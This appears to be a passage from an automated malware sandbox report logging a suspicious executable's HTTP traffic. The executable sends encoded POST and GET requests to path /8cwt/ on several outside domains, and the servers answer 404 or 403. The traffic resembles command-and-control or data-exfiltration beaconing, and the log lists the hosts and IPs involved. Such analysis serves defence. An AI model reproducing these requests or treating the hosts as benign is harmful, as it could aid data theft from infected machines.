                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.11.3049852203.161.49.193802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:15:44.628499031 CEST712OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.innovtech.life
                                      Referer: http://www.innovtech.life/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 66 51 42 6d 6d 59 7a 36 71 76 4b 2b 43 2b 4c 65 7a 50 74 42 33 52 78 31 51 70 7a 63 6d 38 54 44 37 75 65 39 41 51 39 48 68 34 34 6e 4f 76 65 71 34 73 48 7a 74 56 62 62 6c 32 30 74 77 4e 76 42 65 30 36 66 6e 31 39 45 6a 44 50 73 77 71 6a 73 2b 74 34 4c 46 66 49 67 57 61 66 4b 77 62 49 2f 30 34 4b 73 6a 42 6f 36 4e 39 53 64 4c 74 59 75 71 68 6a 5a 46 71 43 35 35 61 59 6b 73 53 77 6a 6e 66 35 34 59 71 35 4d 64 37 42 76 6a 4f 32 2f 4a 2f 59 68 54 64 48 43 77 4e 35 47 4d 30 52 4e 56 44 59 39 32 57 59 6c 2f 65 5a 39 64 34 47 63 6c 6b 6f 71 52 4a 71 5a 38 77 6e 2f 31 41 52 76 35 4d 44 52 2b 6f 54 6f 67 77 4f 52 72 6b 56 47 71 63 2f 50 78 63 4d 3d
                                      Data Ascii: 24eluX=fQBmmYz6qvK+C+LezPtB3Rx1Qpzcm8TD7ue9AQ9Hh44nOveq4sHztVbbl20twNvBe06fn19EjDPswqjs+t4LFfIgWafKwbI/04KsjBo6N9SdLtYuqhjZFqC55aYksSwjnf54Yq5Md7BvjO2/J/YhTdHCwN5GM0RNVDY92WYl/eZ9d4GclkoqRJqZ8wn/1ARv5MDR+oTogwORrkVGqc/PxcM=
                                      Jun 4, 2024 14:15:44.811589956 CEST533INHTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:15:44 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.11.3049853203.161.49.193802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:15:47.339118958 CEST1629OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.innovtech.life
                                      Referer: http://www.innovtech.life/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 66 51 42 6d 6d 59 7a 36 71 76 4b 2b 43 2b 4c 65 7a 50 74 42 33 52 78 31 51 70 7a 63 6d 38 54 44 37 75 65 39 41 51 39 48 68 34 77 6e 4f 64 57 71 37 4e 48 7a 73 56 62 62 37 6d 30 73 77 4e 75 42 65 30 79 54 6e 31 35 55 6a 41 33 73 79 49 48 73 75 4d 34 4c 50 66 49 67 4f 71 66 50 39 37 4a 2f 30 34 61 6f 6a 42 34 36 4e 39 53 64 4c 76 41 75 71 31 33 5a 48 71 43 36 77 36 59 77 2f 43 78 2b 6e 65 52 4f 59 71 39 63 61 4b 68 76 69 75 6d 2f 4b 4d 77 68 66 64 48 63 78 4e 34 44 4d 30 56 6f 56 41 39 43 32 58 38 44 2f 63 4a 39 63 4d 50 51 79 55 30 56 47 6f 65 47 31 51 6a 79 68 79 4a 34 30 2f 62 63 36 59 50 53 33 68 4b 4f 7a 68 6c 6e 39 2b 48 34 76 4b 4f 78 71 2f 72 50 52 37 75 7a 33 43 36 55 61 6c 4d 62 2b 4a 54 75 49 79 64 42 57 5a 7a 76 5a 72 2f 6a 58 72 79 2b 61 4f 6a 52 49 52 43 51 4e 70 56 76 31 62 58 36 64 77 51 42 32 39 65 73 65 6e 7a 68 34 77 74 6d 66 70 46 6a 53 65 64 6e 7a 63 32 38 6a 65 71 53 66 43 71 53 75 44 4c 58 57 57 55 37 36 64 35 6d 61 42 30 54 52 59 33 41 42 65 2b 78 68 56 59 [TRUNCATED]
                                      Data Ascii: 24eluX=fQBmmYz6qvK+C+LezPtB3Rx1Qpzcm8TD7ue9AQ9Hh4wnOdWq7NHzsVbb7m0swNuBe0yTn15UjA3syIHsuM4LPfIgOqfP97J/04aojB46N9SdLvAuq13ZHqC6w6Yw/Cx+neROYq9caKhvium/KMwhfdHcxN4DM0VoVA9C2X8D/cJ9cMPQyU0VGoeG1QjyhyJ40/bc6YPS3hKOzhln9+H4vKOxq/rPR7uz3C6UalMb+JTuIydBWZzvZr/jXry+aOjRIRCQNpVv1bX6dwQB29esenzh4wtmfpFjSednzc28jeqSfCqSuDLXWWU76d5maB0TRY3ABe+xhVYaNJahIx/TGyu3UVHEvALcr/79udhI8FMfSV9znbVokJCWmmJxiXnUUtXLvX2K/ooo46NSFz1h5NsWaa3LAkwJjR+2s8kpKLNiTPUnrLlsqVOFo4g/yE/MrG+6mmu3kleid/66rhLE3aTFgB1B1nx5rIdsyITeP5oLFiwyEUIocWD2LNuHernjvh06m+J1GeRQKFnAMSAjpY4LhoSMXYVp4vPE3E5Nelx4F68rzw0zHSEM3jEt+jXtKXt+JscL0A2mj32JDNHG+Wdqob0vedtJEv9+8RL8ahYoxSTm2WqM0olJ7VquuhL370R6hzDAZpCR9LKpjtOxSBwVOpRwzS9y+GMdBvZaiwOOn05k+3vVqNUpQ0A0/fkXxhaXTebO6LRcDcmoUIMMEVxQBS6uQVK4XAyqcYO8NzavsVKliQ786lc9RV8PxB53xAro+UGq6oCu/7MhGxMe71LPNXRVTOtTY/IQTdP2m7T0kWY12CQHzhusYxGlKo9MwpqDUwGZClOkqbOa7pzzOrx3kAOFCkUrEsetFFO8+vjfiva+ZpIeuoJbTxX9hjXg4RiZdDz1jwsZ/SorhYjCb1Vlj4bgDjEWqeP4l5FY5Rrpdoz5dRNe0CtKP0RnAWmCeYLPhkaLdfFrkidTngE1GpiBsPKyV0wzyQ/6rXtjb73FV [TRUNCATED]
                                      Jun 4, 2024 14:15:47.530402899 CEST533INHTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:15:47 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.11.3049854203.161.49.193802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:15:50.046983957 CEST429OUTGET /8cwt/?24eluX=SSpGlvD+1syJM+fS7Z8C1Cd2ZLeBmOr+68qPZxMelqgcCM6DsfmVmmLjkXM2/P+9S0q4oxoduwfupYzMqMwdcdYcBeP38sFbk5TUrAJPEOGdI/gD7BvPJp4=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:15:50.239666939 CEST548INHTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:15:50 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html; charset=utf-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.11.304985591.195.240.123802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:15:55.670871973 CEST674OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.k4ryd.us
                                      Referer: http://www.k4ryd.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 39 4c 4c 4d 6f 61 75 57 4f 6b 75 51 4c 2f 71 6a 4e 5a 55 2b 69 41 31 6b 36 4d 33 64 49 2b 45 36 65 49 42 78 45 34 62 52 62 67 4c 6b 39 34 58 47 37 69 2b 51 57 55 2b 37 71 54 50 6b 2f 4c 6d 4a 46 55 79 64 45 76 61 7a 6c 31 73 4e 2b 32 78 63 37 67 73 75 59 39 52 7a 6a 32 33 47 47 68 62 7a 35 65 42 71 7a 44 4c 72 70 4a 71 37 44 66 61 7a 56 62 4d 30 66 76 39 65 70 55 30 4c 34 37 78 6c 31 38 68 6b 38 64 6e 4d 31 78 4e 33 48 70 39 55 41 4d 72 30 79 71 37 44 61 45 65 62 71 58 46 4c 6c 75 74 42 38 71 64 74 33 69 78 70 61 41 47 36 59 2b 52 56 57 68 4d 47 69 47 6d 63 32 47 42 75 59 41 3d 3d
                                      Data Ascii: 24eluX=9LLMoauWOkuQL/qjNZU+iA1k6M3dI+E6eIBxE4bRbgLk94XG7i+QWU+7qTPk/LmJFUydEvazl1sN+2xc7gsuY9Rzj23GGhbz5eBqzDLrpJq7DfazVbM0fv9epU0L47xl18hk8dnM1xN3Hp9UAMr0yq7DaEebqXFLlutB8qdt3ixpaAG6Y+RVWhMGiGmc2GBuYA==
                                      Jun 4, 2024 14:15:55.897732019 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.11.304985691.195.240.123802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:15:58.423022032 CEST694OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.k4ryd.us
                                      Referer: http://www.k4ryd.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 39 4c 4c 4d 6f 61 75 57 4f 6b 75 51 4b 63 43 6a 4d 36 73 2b 6b 67 31 6e 2f 4d 33 64 48 65 45 41 65 49 64 78 45 38 43 57 62 57 7a 6b 39 5a 6e 47 30 41 57 51 59 30 2b 37 7a 6a 50 62 77 72 6d 53 46 55 2f 67 45 76 6d 7a 6c 31 6f 4e 2b 32 68 63 36 58 77 76 4a 39 52 31 71 57 33 45 49 42 62 7a 35 65 42 71 7a 44 50 4e 70 4a 79 37 44 50 4b 7a 57 36 4d 72 42 2f 39 42 68 30 30 4c 38 37 78 68 31 38 68 57 38 5a 48 71 31 30 4a 33 48 74 78 55 41 2b 44 33 34 71 37 42 45 30 66 2b 35 48 52 46 6b 75 4a 64 79 70 41 30 35 43 64 4c 53 33 33 67 46 39 6c 58 46 42 77 72 2b 48 4c 30 30 45 41 31 46 44 46 6d 45 6a 70 66 75 4e 69 56 46 6f 54 67 4f 6d 58 35 66 44 45 3d
                                      Data Ascii: 24eluX=9LLMoauWOkuQKcCjM6s+kg1n/M3dHeEAeIdxE8CWbWzk9ZnG0AWQY0+7zjPbwrmSFU/gEvmzl1oN+2hc6XwvJ9R1qW3EIBbz5eBqzDPNpJy7DPKzW6MrB/9Bh00L87xh18hW8ZHq10J3HtxUA+D34q7BE0f+5HRFkuJdypA05CdLS33gF9lXFBwr+HL00EA1FDFmEjpfuNiVFoTgOmX5fDE=
                                      Jun 4, 2024 14:15:58.654165030 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.11.304985791.195.240.123802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:16:01.185097933 CEST1611OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.k4ryd.us
                                      Referer: http://www.k4ryd.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 39 4c 4c 4d 6f 61 75 57 4f 6b 75 51 4b 63 43 6a 4d 36 73 2b 6b 67 31 6e 2f 4d 33 64 48 65 45 41 65 49 64 78 45 38 43 57 62 56 54 6b 38 71 76 47 31 6e 4b 51 62 30 2b 37 37 44 50 65 77 72 6e 53 46 55 6e 6b 45 76 71 4e 6c 33 67 4e 73 46 5a 63 75 32 77 76 41 39 52 31 6e 32 33 4a 47 68 62 63 35 65 52 32 7a 44 2f 4e 70 4a 79 37 44 4a 47 7a 43 37 4d 72 44 2f 39 65 70 55 30 66 34 37 78 4a 31 34 46 73 38 5a 44 63 31 41 39 33 48 4a 64 55 54 39 72 33 30 71 37 35 46 30 66 63 35 48 4d 48 6b 75 46 76 79 74 42 66 35 42 4e 4c 57 53 65 44 57 66 78 65 54 6a 73 31 2f 6b 50 4a 31 45 63 6a 44 52 46 63 43 69 6b 68 71 74 6d 68 44 49 50 72 66 6d 44 31 44 44 74 65 67 66 32 2b 58 35 62 4e 52 47 51 7a 6d 42 78 72 6b 4c 2f 62 5a 6f 73 68 70 61 62 43 4d 4b 51 69 72 63 75 30 51 74 42 63 36 45 44 7a 4d 65 78 6a 6b 46 51 4d 76 72 4b 51 71 2b 67 6d 6f 34 49 2f 65 68 5a 67 73 4f 6e 42 52 50 56 39 6e 6a 78 36 50 36 66 62 7a 4e 63 78 31 46 58 71 69 6c 45 77 58 55 76 59 71 6a 70 79 6e 72 75 65 57 58 31 79 5a 6f 4f [TRUNCATED]
                                      Data Ascii: 24eluX=9LLMoauWOkuQKcCjM6s+kg1n/M3dHeEAeIdxE8CWbVTk8qvG1nKQb0+77DPewrnSFUnkEvqNl3gNsFZcu2wvA9R1n23JGhbc5eR2zD/NpJy7DJGzC7MrD/9epU0f47xJ14Fs8ZDc1A93HJdUT9r30q75F0fc5HMHkuFvytBf5BNLWSeDWfxeTjs1/kPJ1EcjDRFcCikhqtmhDIPrfmD1DDtegf2+X5bNRGQzmBxrkL/bZoshpabCMKQircu0QtBc6EDzMexjkFQMvrKQq+gmo4I/ehZgsOnBRPV9njx6P6fbzNcx1FXqilEwXUvYqjpynrueWX1yZoOgKQ0lmTzbhHFDFBx3R/BytG/hb99HY62uRGyjv+oCX9B8T1Ayvf4o/Q0KagAEVAKeTbzf7G7BTp80jAYIdv66rt50H4H6eioXC3NiKa1iyJDHN31PqdSkpg2RTeMGJDQQZwzK0cmtxwh/6spDY1vo23xgjxBGtYVvD9xpWR2cyfjLtLB8i1VMsVRzKX4Mtz2yPLhjE9qW/sN/KDQVVQ+wyRtg9CNvsUbiG6a8EzqpOBx3tyQLUbNnnYC0MR5LTc6VjDE9mnbTCfnkI9i0zaBrxQ3sWTm2HvrHBpEmmYGcRjKj4BINpsG1IWCLpOflT9FrMgI8psbqym4F/8pNv887m9EpBQf2cn8fZTUIaJzjCRlDkdsj5AUHfmBFUoPhA1RYx+QKadY+9sbLe9gnM1CJr4kUmI+wLYXSjvnk+Urzfb7gOf6u8jFSUvjM2axpA8/ziq6VgpL00AauUT8WdWsYk6tLZQlBGC4jajLYw5/UYbXGPLxof8CaiuONeURmm8cDtCud1LzwCvF18ZJr6ocLX3egckcz0mc2KNRT26QquzoPa3IvJeE86G6k35hdCnqUqeXNUYzrU/nktIXLzWA0vVVZjp/aAvSENlCz0pIw1xlZLD+16kUzWlIzWWR0m4MlyRd5cfddnYMPeEXpGE06x1VEvFz9zwU1x [TRUNCATED]
                                      Jun 4, 2024 14:16:01.412623882 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.11.304985891.195.240.123802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:16:03.932521105 CEST423OUTGET /8cwt/?24eluX=wJjsrv+xTFW5EezvLu5DoT5e4On1D8g+dr15EOXITWTD1anv0RLrfGS01TvW8pCuGmfcOvvelUpztksk4WpfZfFxijTtARXG8NIL7Taa8Kq3eoSsUv86NcY=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:16:04.157922983 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.11.304986066.81.203.196802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:17:43.404165983 CEST707OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.accentbathrooms.com
